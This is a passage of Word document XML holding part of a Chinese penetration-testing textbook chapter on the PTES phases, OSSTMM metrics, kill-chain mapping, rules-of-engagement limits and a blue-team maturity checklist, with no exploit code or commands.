      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Movement（TA0008</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">横向移动）、Collection（TA0009</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据收集）。后渗透是验证“纵深防御”有效性的关键环节——许多组织在边界防护上投入巨大，但内网横向移动几乎无阻拦，本阶段能够将这类系统性弱点暴露无遗。但同样，后渗透必须在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的严格约束下进行：所有收集到的数据必须在测试结束后交还客户并安全销毁；不得植入真实的后门或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通道；一旦获取到足以证明风险存在的证据（例如到达核心数据库主机），应立即停止进一步扩散。本书卷四将详细展开后渗透技术与内网攻击面分析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段七：报告（Reporting）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报告阶段是渗透测试的最终交付物，也是决定项目价值的“最后一公里”。一份优秀的渗透测试报告绝非漏洞扫描器输出的堆砌，而是经过人工分析、业务风险评估、修复方案优先级排序后的结构化文档。PTES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对报告的最低要求包括：执行摘要（面向管理层，用业务语言说明测试范围、总体风险等级、关键发现与建议优先修补事项）；技术细节（面向技术团队，每个有效漏洞的详细描述，包括漏洞位置、复现步骤、利用截图/日志、CVSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">评分向量——此处不编造具体</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分值，风险评级依据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">约定的方法或客户内部标准）；修复建议（具体、可操作、分短期/中期/长期的补救措施）；测试过程记录（时间线、使用的工具与方法、未成功利用的潜在漏洞及原因说明）。报告的撰写应遵循“先结论后论据”的原则——执行摘要务必精炼，因为多数管理层读者只会阅读前两页。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OSSTMM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的度量思想</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果说</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供的是“步骤”的框架，OSSTMM（Open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Source Security Testing Methodology </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual）提供的则是“度量”的标尺。OSSTMM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pete Herzog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">创立并持续维护，其核心理念可以用一句话概括：安全测试必须产生可验证、可重复、可量化的结果，而非依赖测试者的主观直觉。OSSTMM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">引入了一套独特的度量体系——RAV（Risk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Assessment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Values，风险评估值），通过计算攻击面（Attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Surface）、损失预期（Loss</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Expectancy）与控制有效性（Control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Effectiveness）之间的数学关系，得出客观的安全态势评分。这种度量思想直接对抗渗透测试行业的一个常见弊病：不同的测试者测试同一个目标，可能得出完全不同的风险评级——这在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSSTMM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">看来是不可接受的，因为它意味着方法论缺乏科学性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OSSTMM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的关系并非互相替代，而是互补。PTES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">告诉我们每个阶段“应该做什么”；OSSTMM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">告诉我们“做到什么程度才算合格”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“如何度量测试结果的可靠性”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。例如，在情报收集阶段，PTES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要求收集资产清单；OSSTMM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则进一步要求计算攻击面可见性指数（Visibility），即目标的资产、服务、信息在多大程度上暴露给潜在攻击者。在漏洞分析阶段，PTES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要求识别潜在漏洞；OSSTMM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则要求同时度量控制措施的存在性与有效性——仅发现一个漏洞并不足以说明安全态势，必须同时评估目标已有的安全控制（防火墙、IDS、WAF、安全策略）能否有效阻断该漏洞的利用路径。这种“攻防一体度量”的思想与本书的攻防对称原则高度一致。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与杀伤链及全书卷次的交叉对照</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">七阶段与杀伤链及本书的卷次结构进行对照，能够帮助读者建立“地图上的位置感”——在阅读后续章节时，始终清楚当前所学技术属于渗透生命周期的哪一个阶段，又服务于哪一个攻防目标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的前期交互与情报收集阶段，对应杀伤链的“侦察”以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TA0043。这两个阶段在本书卷二中详细展开（信息收集与被动/主动侦察技术）。威胁建模与漏洞分析阶段，跨越杀伤链的“武器化”与“投递”的决策环节——攻击者在此决定使用何种武器攻击哪个目标。这部分在卷三（Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用）、卷四（系统安全）中分别针对不同目标类型展开技术深潜。利用与后渗透阶段，对应杀伤链的“利用→安装→C2→目标行动”四个阶段，也是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵覆盖最密集的区域；本书卷三与卷四将详细讲解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞利用、系统漏洞利用、二进制漏洞利用、权限提升、横向移动、持久化等具体技术。报告阶段是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">独有而杀伤链模型所不覆盖的环节——因为杀伤链描述的是攻击者的行为，而报告是渗透测试者区别于攻击者的核心标志：攻击者不需要写报告，渗透测试者必须写。卷五（防御与监测）将回到这一生命周期，从蓝队视角讨论如何以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为坐标系为每个攻击阶段构建检测方案。</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PTES与全书卷次映射</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> direction TB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">P1[前期交互]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">V0[法律框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ch3]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">P2[情报收集]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">V2[卷二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">侦察]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">P3[威胁建模]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">V5[卷五</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ATT&amp;CK]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">P4[漏洞分析]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">V3[卷三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> P4 --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">V4[卷四</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">P5[利用]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; V3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> P5 --&gt; V4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">P6[后渗透]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; V4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">P7[报告]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">V5[卷五</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">生命周期的迭代本质与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">裁剪</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试并非严格的一遍式线性流程。实践中，后渗透阶段获取的新信息往往会促使测试者回到情报收集或漏洞分析阶段重新评估——例如横向移动后发现了之前未识别的新子网，或者从一台主机的内存转储中提取了域管理员的凭据。PTES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的七阶段应被理解为逻辑阶段而非机械步骤：每个阶段的输出是下一阶段的输入，但发现新信息时允许回溯与迭代。这与杀伤链的线性模型有所不同——杀伤链更强调攻击者的宏观进展方向，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">更贴近渗透测试者在项目中的真实工作模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与此同时，每个阶段的深度与广度完全取决于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的约束。一个典型例子是时间窗限制：如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只给了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小时的测试窗口，就不可能按</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准执行完整的情报收集循环，必须将资源集中在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指定的高优先级目标上。另一个例子是禁止动作约束：如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明确禁止主动的端口扫描（某些生产环境中确实有此规定以规避对老旧设备的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DoS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">风险），情报收集就只能依赖被动来源。方法论是理想化的框架，RoE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是真实世界的法律约束，二者之间的张力要求渗透测试者具备专业判断力——知道标准流程是什么，更知道在特定约束下如何安全、合法、高效地裁剪流程。这正是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将“前期交互”置于第一阶段的核心原因：先划边界，再谈技术。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试方法论本身并不直接包含攻击技术，但方法论层面的防御考量同样至关重要。从蓝队/甲方视角来看，防御方可以将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的七阶段作为检验自身安全运营成熟度的对照清单：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前期交互对标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：甲方是否建立了规范的第三方安全测试供应商准入流程？是否具备标准化的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模板与评审机制？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">情报收集对标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：组织是否定期对自身的公开信息暴露面进行自查（外部攻击面管理）？是否监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS/SSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书/代码仓库的信息泄漏？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">威胁建模对标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：安全运营中心是否基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">建立了针对本组织的定制化威胁模型？是否识别了关键资产及其最可能的攻击路径？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
